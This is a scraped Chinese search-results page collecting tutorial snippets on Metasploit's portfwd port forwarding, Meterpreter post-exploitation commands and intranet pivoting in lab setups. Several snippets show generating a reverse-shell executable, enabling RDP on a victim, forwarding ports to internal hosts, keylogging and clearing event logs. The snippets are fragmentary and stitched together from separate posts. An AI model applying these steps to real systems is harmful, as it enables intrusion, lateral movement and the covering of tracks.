精华内容
下载资源
问答
  • portfwd使用

    千次阅读 2019-07-01 16:23:14
    一款内置于msf的工具 靶机 win7 192.168.5.101 攻击机 win 10 192.168.0.31 攻击机 kali 192.168.5.102 ...portfwd add‐l 33333 ‐r 192.168.5.101 ‐p 3389 使用win10 远程桌面功能访问kali的52端口,既访...

    一款内置于msf的工具

    靶机 win7 192.168.5.101
    攻击机 win 10 192.168.0.31
    攻击机 kali 192.168.5.102

    先配置msf,并反弹会话

    在这里插入图片描述

    转发,把win7 3389转发到kali的33333端口

    portfwd add‐l 33333 ‐r 192.168.5.101 ‐p 3389
    

    在这里插入图片描述

    使用win10 远程桌面功能访问kali的33333端口,既访问win07远程桌面

    在这里插入图片描述

    展开全文
  • Metasploit 中的端口转发与端口映射Metasploit portfwd 原理2 实验环境2.1 建立 meterpreter 反向连接2.2 portfwd 端口转发2.3 portfwd 端口映射 Metasploit portfwd 原理 portfwd 是借用 meterpreter s.

    郑重声明:
    本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。

    portfwd 原理

    • portfwd 是借用 meterpreter shell 建立的连接进行数据传输,达到端口转发的目的。
    • 当建立反向连接时,可以绕过防火墙的检测。
    meterpreter > portfwd --help
    Usage: portfwd [-h] [add | delete | list | flush] [args]
    
    OPTIONS:
    -L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
    -R        Indicates a reverse port forward.
    -i <opt>  Index of the port forward entry to interact with (see the "list" command).
    -l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
    -p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
    -r <opt>  Forward: remote host to connect to.
    

    2 实验环境

    image-20210901115147825

    2.1 建立 meterpreter 反向连接

    1. 生成 Metaspolit 后门程序

      msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.0.2 lport=4444 -f exe > /var/www/html/evil.exe
      
    2. kali 配置监听 meterpreter 反向连接

      use exploit/multi/handler
      set payload windows/meterpreter/reverse_tcp
      set lhost 192.168.0.2
      run
      
    3. WEB Server 下载 Metaspolit 后门程序,并打开程序

    4. meterpreter 反向连接建立成功

      image-20210901115116102

    2.2 portfwd 端口转发

    1. 配置 portwd 端口转发

      meterpreter > portfwd add -L 192.168.0.2 -l 18080 -p 80 -r 192.168.100.151
      
    2. 使用 portwd list 查看是否建立端口转发连接

      image-20210901115352741

    3. 验证:

      image-20210901115415588

    2.3 portfwd 端口映射

    1. 配置 portwd 端口转发

      meterpreter > portfwd add -l 12323 -p 23 -r 192.168.100.151
      
    2. 使用 portwd list 查看是否建立端口映射连接

      image-20210901115536582

    3. 验证:

      ┌──(kali㉿kali)-[~]
      └─$ ssh -p 12323 root@127.0.0.1
      

      image-20210901115626879

    展开全文
  • Metasploit Portfwd 端口转发 Portfwd简介(端口转发/重定向) Meterpreter shell中的portfwd命令最常用作透视技术,允许直接访问攻击系统无法访问的机器。在可以访问攻击者和目标网络(或系统)的受损主机上...

    Metasploit Portfwd 端口转发

     

    Portfwd简介(端口转发/重定向)

     

    Meterpreter  shell中的portfwd命令最常用作透视技术,允许直接访问攻击系统无法访问的机器。在可以访问攻击者和目标网络(或系统)的受损主机上运行此命令,我们可以实质上通过本机转发TCP连接,从而使其成为一个支点。就像使用ssh连接的端口转发技术一样,portfwd将中继与连接的机器之间的TCP连接。

     

    操作指令

     

    portfwd -h //查看帮助
    Usage: portfwd [-h] [add | delete | list | flush] [args]
    
    OPTIONS:
         -L >opt>  要监听的本地主机(可选)
         -h        帮助
         -l >opt>  要监听的本地端口
         -p >opt>  要连接的远程端口
         -r >opt>  要连接的远程主机

    image-20210518224830766.png

    开启代理

     

    映射80端口

    meterpreter > portfwd add -l 8888 -p 80 -r 10.10.10.132
    //把本地的8888端口映射到10.10.10.132的80端口上,然后访问本地的8888端口就相当于访问10.10.10.132的80端口

    image-20210518225514226.png映射3389端口

    portfwd add -l 3389 -p 3389 -r 10.10.10.132
    rdesktop 127.0.0.1:3389

    image-20210518230016242.png

    映射边界服务器80端口并通过BurpSuite抓包

     

    做端口映射,把本地1234端口映射到192.168.137.131的80端口上

     

    portfwd add -l 1234 -p 80 -r 192.168.137.131

    image-20210518231320855.png

    burp和浏览器设置代理image-20210518231440397.png成功抓包image-20210518231253261.png

    清楚所有端口映射

    portfwd flush

    image-20210518231608382.png

     

    展开全文
  • Metasploit Portfwd端口抓发 获取meterpreter的shell后可进行端口转发操作,可以使用portfwd -h 转发入侵机器的端口。 先获取目标主机的shell建立连接 使用enable_rdp模块开启目标的远程连接 run post/...

    Metasploit Portfwd端口抓发

    获取meterpreter的shell后可进行端口转发操作,可以使用portfwd -h 转发入侵机器的端口。

    先获取目标主机的shell建立连接

    使用enable_rdp模块开启目标的远程连接

    run post/windows/manage/enable_rdp

    portfwd add -l 3389 -p 3389 -r 192.168.28.131
    rdesktop 127.0.0.1:3389

    展开全文
  • 出处是上面的链接: 二、实验 然后这次是用msf的portfwd攻击模块实验的: 2.1端口映射 首先,msf标准payload攻击方式use exploit/multi/handler,这个不用我细说了吧,,自己百度去…… 生成metasploit后门 msfvenom...
  • 第九十五课:基于Portfwd端口转发.docx
  • 基于Portfwd端口转发

    2021-01-17 21:12:37
    Portfwd是一款强大的端口转发工具,支持TCP,UDP,支持IPV4--IPV6的转换转发。并且内置于meterpreter。其中exe单版本源码地址 实验环境 攻击机: 192.168.159.137 Debian(Kali) 靶 机: 192.168.159.131 Windows ...
  • Metasploit portfwd跳板渗透

    千次阅读 2013-07-11 22:43:31
    前几天翻看Metasploit’s Meterpreter文档中关于portfwd介绍 Usage:portfwd [ -arv ] [ -L laddr ] [ -l lport ][ -h rhost ] [ -p rport ] [ -P ],看懂了不会用。再者就是在《metasploit渗透测试指南》p89页上参考...
  • 后渗透之meterpreter学习笔记

    千次阅读 多人点赞 2019-09-25 09:45:11
    portfwd add -l 1111 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地1111端口 rdesktop 127.0.0.1:1111 # 需要输入用户名密码连接 rdesktop -u Administrator -p 123 127.0.0.1:1111 # -u 用户名 -p 密码...
  • 内网端口转发小技巧

    2020-11-30 17:48:51
    5555.reuseaddr.fork TCP4:192.168.93.10:3389 FPipe 转发内网端口 FPipe.exe -l lport -r rport rhost -v portfwd msf自带 生成一个监听 portfwd add -l 1389 -r 192.168.93.10 -p 3389 查看已建立的规则: portfwd...
  • 1. SSH 端口转发 SSH 提供了一个非常... portfwd端口转发 portfwd是meterpreter中内置的功能,也提供了单机版,用于TCP/UDP端口转发服务 Github 项目地址:https://github.com/rssnsj/portfwd (1) 下载编译 git clone ...
  • msf之meterpreter权限绑定以及端口转发

    千次阅读 2019-10-10 10:30:06
     portfwd是meterpreter提供的端口转发功能,在meterpreter下使用portfwd -h命令查看该命令的参数。 常用参数: -l:本地监听端口 -r:内网目标的ip -p:内网目标的端口    上面命令执行之后,会将10.1...
  • meterpreter > portfwd add -l 1234 -p 3389 -r 10.42.0.54 [*] Local TCP relay created: 0.0.0.0:8081 <-> 10.42.0.54:80 将远程主机3389端口转发到本地1234端口上 msfpayload windows/meterpreter/reverse_tcp ...
  • 【tools】Meterpreter 操作汇总

    万次阅读 2021-06-04 00:36:08
    Meterpreter 介绍 Meterpreter 号称“黑客瑞士军刀”,Meterpreter 是 Metasploit 框架中的一个杀手锏,通常作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后能够返回一个我们控制通道,例如利用远程过程带哦用 ...
  • 文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网域信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并...
  • 7.18.1 load/use命令: 7.18.2 run命令: 7.19 生成持续性后门: 7.19.1 启动项启动: 7.19.2 服务启动: 7.20 设置Socks代理: 7.21 portfwd端口转发: 7.22 清除事件日志: 8. 导入并执行PowerShell脚本...
  • 用目标主机摄像头拍照 使用扩展库 生成持续性后门 设置Socks4a代理 portfwd端口转发 清除事件日志 导入并执行PowerShell脚本 加载stdapi 升级Session Meterpreter的更多用法 Metasploit Metasploit Framework(MSF)是...
  • 史上最强内网渗透知识点总结

    千次阅读 2019-02-12 16:03:46
    文章内容没谈 snmp 利用,可以去乌云等社区获取,没有后续内网持久化,日志处理等内容。 获取 webshell 进内网 测试主站,搜 wooyun 历史洞未发现历史洞,github, svn, 目录扫描未发现敏感信息, 无域传送,端口只...
  • 渗透之——Metasploit命令及模块

    万次阅读 2019-01-26 10:26:29
    show exploits 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击载荷。 search name 查找metasploit框架中所有的...
  • 例如目标主机上开启了3389,但是只允许特定IP访问,攻击主机无法连接,可以使用portfwd命令把目标主机的3389端口转发到其他端口打开 例如:portfwd   add -l   1122 -p 3389 -r   192.168.250.176 ...
  • 后渗透Meterpreter常用命令记录

    千次阅读 2017-12-18 23:35:15
    端口转发是利用的portfwd命令 0x09.键盘记录 keyscan_start #开始键盘记录 keyscan_dump #导出记录数据 keyscan_stop #结束键盘记录 0x10.sniffer抓包 use sniffer sniffer_interfaces #查看网卡 ...
  • 内网渗透思路整理与工具使用

    千次阅读 2018-06-09 13:43:09
    使用msf的portfwd工具可以转发内网ip的端口。 关注的两个点: 寻找交换机路由器,尝试snmp弱口令。关于snmp的知识:http://wooyun.jozxing.cc/static/drops/tips-409.html 通过收集到的信息,编写字典,对ftp,ssh,db...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 493
精华内容 197
关键字:

portfwd